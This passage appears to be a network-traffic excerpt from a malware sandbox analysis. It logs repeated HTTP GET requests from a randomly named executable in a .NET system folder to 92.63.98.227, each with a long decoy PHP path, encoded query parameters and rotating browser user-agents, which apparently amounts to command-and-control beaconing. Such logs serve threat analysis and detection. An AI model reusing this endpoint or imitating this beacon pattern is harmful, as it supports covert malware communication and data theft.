            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            12 | 192.168.2.6 | 51858 | 92.63.98.227 | 80 | 6316 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:46.886065960 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            13 | 192.168.2.6 | 51859 | 92.63.98.227 | 80 | 6316 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:47.506887913 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            14 | 192.168.2.6 | 51860 | 92.63.98.227 | 80 | 6316 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:48.132966042 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            15 | 192.168.2.6 | 51861 | 92.63.98.227 | 80 | 6316 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:48.735930920 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            16 | 192.168.2.6 | 51862 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:52.184604883 CEST789OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            17 | 192.168.2.6 | 51863 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:52.842684031 CEST789OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            18 | 192.168.2.6 | 51864 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:53.444685936 CEST789OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            19 | 192.168.2.6 | 51865 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:32:54.050138950 CEST789OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            20 | 192.168.2.6 | 51867 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:04.130373955 CEST730OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            21 | 192.168.2.6 | 51868 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:04.736651897 CEST730OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            22 | 192.168.2.6 | 51869 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:05.354413033 CEST730OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            23 | 192.168.2.6 | 51870 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:05.953476906 CEST730OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            24 | 192.168.2.6 | 51871 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:11.324280977 CEST679OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            25 | 192.168.2.6 | 51872 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:11.919771910 CEST679OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            26 | 192.168.2.6 | 51873 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:12.529107094 CEST679OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            27 | 192.168.2.6 | 51874 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:13.328346968 CEST679OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            28 | 192.168.2.6 | 51875 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:22.377326012 CEST851OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            29 | 192.168.2.6 | 51876 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:22.971332073 CEST851OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            30 | 192.168.2.6 | 51877 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:23.591308117 CEST851OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            31 | 192.168.2.6 | 51878 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:24.213080883 CEST851OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            32 | 192.168.2.6 | 51881 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:35.152940035 CEST705OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            33 | 192.168.2.6 | 51882 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:35.771965981 CEST705OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            34 | 192.168.2.6 | 51883 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:36.386970997 CEST705OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            35 | 192.168.2.6 | 51884 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
